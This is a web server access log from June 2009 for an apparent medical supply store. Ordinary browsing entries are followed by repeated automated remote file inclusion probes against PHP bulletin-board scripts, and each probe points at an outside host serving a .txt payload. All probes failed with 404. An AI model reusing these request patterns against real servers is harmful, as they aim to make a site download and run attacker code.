70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:18 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:18 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:18 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:18 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:18 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:20 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG HTTP/1.1" 200 38030 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:23 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:23 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:43 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2126284E4683A30096B0065+M37+ENG HTTP/1.1" 200 76253 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:44 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284E4683A30096B0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:44 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284E4683A30096B0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:47 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284E4683A30096B0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [28/Jun/2009:07:47:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
86.109.166.161 - - [28/Jun/2009:07:50:09 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:07:50:09 -0400] "GET /logs/access_log.Q109060900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:07:50:09 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:07:50:13 -0400] "GET /logs/access_log.Q109060900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:07:50:13 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:07:50:13 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.820"
200.142.148.142 - - [28/Jun/2009:07:50:22 -0400] "GET /logs////include/bbs.lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.142.148.142 - - [28/Jun/2009:07:50:22 -0400] "GET /logs/access_log.Q109052800////include/bbs.lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.142.148.142 - - [28/Jun/2009:07:50:22 -0400] "GET /logs/error_log.Q109052800////include/bbs.lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.249.71.16 - - [28/Jun/2009:07:50:28 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
66.249.71.16 - - [28/Jun/2009:07:50:28 -0400] "GET /images/items/682428_thumb.jpg HTTP/1.1" 200 2075 "-" "Googlebot-Image/1.0"
86.109.166.161 - - [28/Jun/2009:07:51:00 -0400] "GET /logs/access_log.Q109051200//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:07:51:02 -0400] "GET /logs/access_log.Q109051200//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.820"
222.162.115.67 - - [28/Jun/2009:07:51:19 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:20 -0400] "GET /logs/access_log.Q109060900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:20 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:21 -0400] "GET /logs/access_log.Q109060900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:21 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:21 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:26 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:26 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:26 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:37 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:37 -0400] "GET /logs/access_log.Q109060900%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:37 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:51:48 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:51:48 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:51:48 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:48 -0400] "GET /logs/access_log.Q109060900%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:49 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:49 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:51:56 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:51:56 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:51:56 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:56 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:56 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:51:56 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:52:16 -0400] "GET /logs/access_log.Q109060900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:52:42 -0400] "GET /logs/access_log.Q109051200%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:52:47 -0400] "GET /logs/access_log.Q109051200%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:07:52:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.162.115.67 - - [28/Jun/2009:07:53:28 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:53:28 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
